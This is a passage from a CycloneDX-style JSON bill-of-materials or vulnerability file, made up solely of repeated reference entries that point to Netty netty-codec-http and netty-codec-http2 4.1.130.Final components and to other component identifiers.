          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
